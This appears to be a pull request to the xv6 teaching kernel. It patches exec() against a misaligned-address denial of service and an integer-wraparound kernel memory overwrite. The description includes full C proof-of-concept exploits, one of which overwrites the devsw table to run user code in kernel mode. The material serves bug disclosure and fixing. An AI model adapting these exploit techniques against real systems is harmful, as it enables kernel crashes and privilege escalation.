### PR TITLE
Fix vulnerabilities in exec() function

### DIFF
--- a/exec.c
+++ b/exec.c
@@ -44,6 +44,8 @@ exec(char *path, char **argv)
       continue;
     if(ph.memsz < ph.filesz)
       goto bad;
+    if(ph.vaddr + ph.memsz < ph.vaddr)
+      goto bad;
     if((sz = allocuvm(pgdir, sz, ph.vaddr + ph.memsz)) == 0)
       goto bad;
     if(ph.vaddr % PGSIZE != 0)

--- a/exec.c
+++ b/exec.c
@@ -46,6 +46,8 @@ exec(char *path, char **argv)
       goto bad;
     if((sz = allocuvm(pgdir, sz, ph.vaddr + ph.memsz)) == 0)
       goto bad;
+    if(ph.vaddr % PGSIZE != 0)
+      goto bad;
     if(loaduvm(pgdir, (char*)ph.vaddr, ip, ph.off, ph.filesz) < 0)
       goto bad;
   }


### PR DESCRIPTION
The `exec()` function in file `exec.c` had two vulnerabilities.

* denial of service via misaligned virtual address
* arbitrary code execution using wrapping in calculation of VM size

This user application is a exploit code for the first vulnerability.

```
#include "types.h"
#include "user.h"
#include "fcntl.h"

void elfgen(char *name) {
  static char magic[] = {
    127,69,76,70,1,1,1,0,0,0,0,0,0,0,0,0,2,0,3,0,1,0,0,0,7,0,0,0,52,0,0,0,
    84,0,0,0,0,0,0,0,52,0,32,0,1,0,40,0,3,0,2,0,1,0,0,0,204,0,0,0,7,0,0,0,
    7,0,0,0,7,0,0,0,7,0,0,0,5,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
    1,0,0,0,6,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,7,0,0,0,
    3,0,0,0,0,0,0,0,0,0,0,0,211,0,0,0,15,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,184,2,0,0,0,205,64,0,46,116,101,120,116,0,46,115,116,114,116,97,98,0
  };
  int fd;
  fd = open(name, O_CREATE | O_WRONLY);
  if(fd == -1) {
    printf(2, "open failed\n");
    exit();
  }
  write(fd, magic, sizeof(magic));
  close(fd);
}

int main(void) {
  char name[] = "unaligned";
  char *argv[2] = {name, 0};
  elfgen(name);
  exec(name, argv);
  printf(2, "exec failed\n");
  exit();
}
```

This program create ELF having `vaddr` which isn't multiple of `PGSIZE` and have the system read it via `exec` system call.
Then, the misaligned virtual address is padded to `loaduvm()` and it leads to panic.

This user application is a exploit code for the second vulnerability.

```
#include "types.h"
#include "user.h"
#include "fcntl.h"

/* Please see kernel.sym and set
 *   DEVSW_ADDR = the address of devsw
 *   PANIC_ADDR = the address of panic
 */
#define DEVSW_ADDR 0x801111c0u
#define PANIC_ADDR 0x8010053du

void shellcode(void*, char*, int);

void set4bytes(char *p, uint data) {
  int i;
  for (i = 0; i < 4; i++) p[i] = (data >> (8 * i));
}

void elfgen(char *name) {
  static char magic[] = {
    127,69,76,70,1,1,1,0,0,0,11,0,0,0,0,0,2,0,3,0,1,0,0,0,0,0,0,0,52,0,0,0,
    126,0,0,0,0,0,0,0,52,0,32,0,3,0,40,0,2,0,2,0,1,0,0,0,236,0,0,0,0,0,0,0,
    0,0,0,0,7,0,0,0,7,0,0,0,5,0,0,0,0,16,0,0,1,0,0,0,2,1,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
    1,0,0,0,6,0,0,0,0,0,0,0,236,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,16,0,0,
    0,0,0,0,7,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,19,1,0,0,15,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,184,2,0,0,0,205,64,0,46,116,101,120,
    116,0,46,115,116,114,116,97,98,0
  };
  static char bomb[(DEVSW_ADDR & 0xfff) + 4] = {0};
  int fd;
  fd = open(name, O_CREATE | O_WRONLY);
  if(fd == -1) {
    printf(2, "open failed\n");
    exit();
  }

  /* address of the program to execute */
  set4bytes(bomb + (DEVSW_ADDR & 0xfff), (uint)shellcode);
  /* address of bomb */
  set4bytes(magic + 0x5C, DEVSW_ADDR & 0xfffff000u);
  /* size of bomb */
  set4bytes(magic + 0x64, sizeof(bomb));
  /* size on memory of bomb */
  set4bytes(magic + 0x68, 0x1000 - (DEVSW_ADDR & 0xfffff000u));

  /* ELF data */
  write(fd, magic, sizeof(magic));
  /* bomb */
  write(fd, bomb, sizeof(bomb));

  close(fd);
}

int main(void) {
  char name[] = "devswhack";
  char *argv[2] = {name, 0};
  int pid;
  elfgen(name);
  pid = fork();
  if (pid == -1) {
    printf(2, "fork failed\n");
  } else if (pid == 0) {
    exec(name, argv);
    printf(2, "exec failed\n");
  } else {
    int fd;
    wait();
    mknod("shellcode", 0, 0);
    fd = open("shellcode", O_RDONLY);
    if (fd < 0) {
      printf(2, "open failed\n");
    } else {
      read(fd, 0, 1);
      close(fd);
    }
  }
  exit();
}

void shellcode(void* a, char* b, int c) {
  void (*panic)(char*) = (void(*)(char*))PANIC_ADDR;
  panic("vulnerable");

  /* avoid warnings for unused arguments */
  (void)a; (void)b; (void)c;
}
```

This program generates an ELF and have the system load it via `exec` system call.
In loading this ELF, one of `ph.vaddr + ph.memsz` becomes `0x1000` due to integer wrapping.
`ph.vaddr` is pointing at the kernel data, and `loaduvm()` will overwrite there.
`devsw[0].read` will be overwritten by the address of `shellcode()` via this loading, and after that,
when this process use `read` system call for special file with `major = 0`,
the function `shellcode()`, which is created by a user, will be executed according to the overwritten `devsw`.
